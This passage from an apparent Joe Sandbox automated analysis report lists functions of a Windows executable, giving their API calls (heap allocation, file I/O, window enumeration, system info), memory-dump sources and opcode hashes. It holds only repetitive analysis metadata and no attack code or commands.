                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseHandleInformationMemoryMoveProcessQuery
                                                                • String ID:
                                                                • API String ID: 2688062226-0
                                                                • Opcode ID: fd5e07e8741dab823db216c58e7993cf15373d2a5c05a80ee096a421e9b6a3b7
                                                                • Instruction ID: 25ea611b6c7a4c6032f62225f801977dfb1b85b568b54f4718c0914ad8fd696c
                                                                • Opcode Fuzzy Hash: fd5e07e8741dab823db216c58e7993cf15373d2a5c05a80ee096a421e9b6a3b7
                                                                • Instruction Fuzzy Hash: A041A4B5E40309BBEB40DF94CD86FBEB7B4EB05305F14006AF904B7282D6759E148BA6
                                                                Function 0040480F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • SysAllocString.OLEAUT32(?), ref: 0040483D
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: AllocString
                                                                • String ID: 7@
                                                                • API String ID: 2525500382-48919864
                                                                • Opcode ID: ef44b6758f7e8dd38297ca8c3c93c1b47e841f9f601a407c95b7b187808cd2a1
                                                                • Instruction ID: 7dcf7b1073dd24ab5f2e42db54d6e45d9604daa1de8e0b7f1b4b9891810e5e84
                                                                • Opcode Fuzzy Hash: ef44b6758f7e8dd38297ca8c3c93c1b47e841f9f601a407c95b7b187808cd2a1
                                                                • Instruction Fuzzy Hash: 53F068B6E00348A7DB50EFD5DC42B6EB774AB44700F048475B70476281D779DA50DB59
                                                                Function 004842EF Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • PathFileExistsA.SHLWAPI(00483E10,00483E10,00000000,00000000,00000000), ref: 00484300
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: ExistsFilePath
                                                                • String ID: a5H
                                                                • API String ID: 1174141254-1818391313
                                                                • Opcode ID: bc155f9aefd854046854585630a46014a44f563b8be9342980b0d91e57f6e3d3
                                                                • Instruction ID: 2ee381d0ca669a93f7a8ea4db94252d82b737ff645aa1bcbe9151c25ef5a4f6e
                                                                • Opcode Fuzzy Hash: bc155f9aefd854046854585630a46014a44f563b8be9342980b0d91e57f6e3d3
                                                                • Instruction Fuzzy Hash: B7E0C270E05308BBC710BE40E947B6DB734EB0A702F80906ABE043B181E6715A25AB9F
                                                                Function 00463ADB Relevance: 3.1, APIs: 2, Instructions: 115COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104), ref: 00463B4B
                                                                • PathFindFileNameA.SHLWAPI(00000000), ref: 00463B7F
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FileName$FindModulePath
                                                                • String ID:
                                                                • API String ID: 1618668439-0
                                                                • Opcode ID: 6a2c8ae281a3f2c4be4be1e360b4261b4cc27f2ae0ddfbefae94f93bb2810be7
                                                                • Instruction ID: a98ddf164613351a7ec9681d1082950ca6b03c5219990a82cf34d2ae541c8e9a
                                                                • Opcode Fuzzy Hash: 6a2c8ae281a3f2c4be4be1e360b4261b4cc27f2ae0ddfbefae94f93bb2810be7
                                                                • Instruction Fuzzy Hash: 3531E9B1E00304BBEB10EFB59D46BAE77B8DB04715F14006BB504F7282E6799F409B5A
                                                                Function 0043FF2B Relevance: 1.6, APIs: 1, Instructions: 135COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetNativeSystemInfo.KERNEL32(00000000,?,?,?,?,?,?,0043FBBC), ref: 0043FFBA
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: InfoNativeSystem
                                                                • String ID:
                                                                • API String ID: 1721193555-0
                                                                • Opcode ID: 2a0d229e355e55547aab068ee7e8295074c8c2809864fa630c9c9fdff783c5f6
                                                                • Instruction ID: 693db7e8361b57ba436b50b348fba0e3e211ed968e5a0034c296085f5fc21831
                                                                • Opcode Fuzzy Hash: 2a0d229e355e55547aab068ee7e8295074c8c2809864fa630c9c9fdff783c5f6
                                                                • Instruction Fuzzy Hash: AB41F7B1A812479BEB00CF98DCC0A44B7F1FF69324B2914B1D446AF344E378B861DB26
                                                                Function 00455EF4 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnumWindows.USER32(0045604F,00000000), ref: 00455F3B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumWindows
                                                                • String ID:
                                                                • API String ID: 1129996299-0
                                                                • Opcode ID: 3c64ab9b2b6f7a27724245be5d05ab14e704189e44b6ea2adeb03fbc447a949f
                                                                • Instruction ID: 4ce8361ed78493a74a4e7177a5c01308a6dace2113c92b98fa79349a07303b30
                                                                • Opcode Fuzzy Hash: 3c64ab9b2b6f7a27724245be5d05ab14e704189e44b6ea2adeb03fbc447a949f
                                                                • Instruction Fuzzy Hash: EB1142B1A00304ABDB50EF74D8C6F6937A8970E315F10142AFA049B296E6799910875A
                                                                Function 0047F559 Relevance: 1.5, APIs: 1, Instructions: 38COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetModuleHandleA.KERNEL32(00000000), ref: 0047F58B
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: HandleModule
                                                                • String ID:
                                                                • API String ID: 4139908857-0
                                                                • Opcode ID: ac94dc257f330638ff14f06f1fa4adeeb0ac26ff8cc901f61283060125f05197
                                                                • Instruction ID: ea3f5665932ad2f34edc6bf6aab39897a6a72eac6c178b2f00f6e5fe460a50d9
                                                                • Opcode Fuzzy Hash: ac94dc257f330638ff14f06f1fa4adeeb0ac26ff8cc901f61283060125f05197
                                                                • Instruction Fuzzy Hash: CFF09671E04309FFDB50EF54DC86BAD7778A705310F10807BF90966282E6798A58DBAA
                                                                Function 0047E392 Relevance: 1.5, APIs: 1, Instructions: 26memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0047E3AD
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CreateHeap
                                                                • String ID:
                                                                • API String ID: 10892065-0
                                                                • Opcode ID: a73b99def3baad678315cb304b22f8869d820025e78d4553ff8336d64bc3ad00
                                                                • Instruction ID: 9a6b6a4a6dfa21085f4df1b5df88413363788b82f2df2ff077b2f5c73c787e8f
                                                                • Opcode Fuzzy Hash: a73b99def3baad678315cb304b22f8869d820025e78d4553ff8336d64bc3ad00
                                                                • Instruction Fuzzy Hash: EEE08630E48308B7E620AF61AC47F6DBA24A70A716F1051EBF9083F1C1D5B99914978F
                                                                Function 0045616B Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • EnumWindows.USER32(00456281,?), ref: 00456180
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: EnumWindows
                                                                • String ID:
                                                                • API String ID: 1129996299-0
                                                                • Opcode ID: dd25d8598ca831e392d38ba66c57df5ea3b948611412c1715744fbdd9a553bd7
                                                                • Instruction ID: 2005816b88822f529ba9eaaabc534035d0a4891a04e2f16536e821f439f5f1d9
                                                                • Opcode Fuzzy Hash: dd25d8598ca831e392d38ba66c57df5ea3b948611412c1715744fbdd9a553bd7
                                                                • Instruction Fuzzy Hash: 33E08671D44208B7D710EE80DD07F79F7389702701F505166FE086B182E6759A24DBDE
                                                                Function 00429DF0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25memorywindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 6825 429df0-429df7 6826 429e04-429e17 RtlAllocateHeap 6825->6826 6827 429df9-429dff GetProcessHeap 6825->6827 6828 429e35-429e38 6826->6828 6829 429e19-429e32 MessageBoxA call 429d10 6826->6829 6827->6826 6829->6828
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(0042B906,00000009,?,0041C3C1,00000001,00000001,00000000,80000301), ref: 00429DF9
                                                                • RtlAllocateHeap.NTDLL(00890000,00000008,80000301), ref: 00429E0D
                                                                • MessageBoxA.USER32(00000000,004F8560,error,00000010), ref: 00429E26
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateMessageProcess
                                                                • String ID: error
                                                                • API String ID: 2992861138-1574812785
                                                                • Opcode ID: 42789f49d26c4287f4e36636d29d109596c8bb179141dc87d156da08d3016c35
                                                                • Instruction ID: bf3efa087c8b5cb8982251e3b842f4d786e4710e511cb19dd94e4f33563dcc3d
                                                                • Opcode Fuzzy Hash: 42789f49d26c4287f4e36636d29d109596c8bb179141dc87d156da08d3016c35
                                                                • Instruction Fuzzy Hash: F7E0D871B443217BDB11AB70BC09F173658AB18751F000129F505EA381FA74AC008BAC
                                                                Function 00429E40 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 25memorywindowCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 6832 429e40-429e47 6833 429e54-429e67 RtlAllocateHeap 6832->6833 6834 429e49-429e4f GetProcessHeap 6832->6834 6835 429e85-429e88 6833->6835 6836 429e69-429e82 MessageBoxA call 429d10 6833->6836 6834->6833 6836->6835
                                                                APIs
                                                                • GetProcessHeap.KERNEL32(00430F07,0042B5A1,00000000,00000000,0042B599,00000000,?,?,?,?,004EE32A), ref: 00429E49
                                                                • RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 00429E5D
                                                                • MessageBoxA.USER32(00000000,004F8560,error,00000010), ref: 00429E76
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Heap$AllocateMessageProcess
                                                                • String ID: error
                                                                • API String ID: 2992861138-1574812785
                                                                • Opcode ID: a737859c86d6c8ac7b9036cebb3af0e9a0c446b071879652699e0c5efdca9e3b
                                                                • Instruction ID: 1d090cf3d50d77caf2b684a4305285ba98a51fa6eaab9df56633b372218b35bf
                                                                • Opcode Fuzzy Hash: a737859c86d6c8ac7b9036cebb3af0e9a0c446b071879652699e0c5efdca9e3b
                                                                • Instruction Fuzzy Hash: 4EE0D871B443217BDB11AB70BC09F573658AB08B50F100129F505EA391EA74AC008B6C
                                                                Function 004CB6C0 Relevance: 6.1, APIs: 4, Instructions: 61fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000020,00000000,?,00000000,80000005), ref: 004CB6D8
                                                                • WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,0000026C,?,00000000,80000005), ref: 004CB717
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 004CB72A
                                                                • CloseHandle.KERNEL32(00000000,?,?,0000026C,?,00000000,80000005), ref: 004CB745
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: CloseFileHandle$CreateWrite
                                                                • String ID:
                                                                • API String ID: 3602564925-0
                                                                • Opcode ID: 5e44c00bc9f6af056ee6d8b1fae6ecb27c52028f03262c11e00e7cef39d2d576
                                                                • Instruction ID: 9b92ee7843717eecef0deef7be85b124004baf2fd79b32a398e9cbdf37809ffd
                                                                • Opcode Fuzzy Hash: 5e44c00bc9f6af056ee6d8b1fae6ecb27c52028f03262c11e00e7cef39d2d576
                                                                • Instruction Fuzzy Hash: C8115E35204341AFD710DF18ECC6F6AB7E4FB84724F15492AFD5497281D374A8098B65
                                                                Function 0042C250 Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000020,00000000,00000000,0040A66A,00000001,00000000,00000000,80000004), ref: 0042C265
                                                                • GetFileSize.KERNEL32(00000000,?,004EE32A,00000268), ref: 0042C27C
                                                                  • Part of subcall function 00429E40: GetProcessHeap.KERNEL32(00430F07,0042B5A1,00000000,00000000,0042B599,00000000,?,?,?,?,004EE32A), ref: 00429E49
                                                                  • Part of subcall function 00429E40: RtlAllocateHeap.NTDLL(00890000,00000000,?), ref: 00429E5D
                                                                  • Part of subcall function 00429E40: MessageBoxA.USER32(00000000,004F8560,error,00000010), ref: 00429E76
                                                                • ReadFile.KERNEL32(00000000,00000008,00000000,?,00000000), ref: 0042C2A8
                                                                • CloseHandle.KERNEL32(00000000), ref: 0042C2AF
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
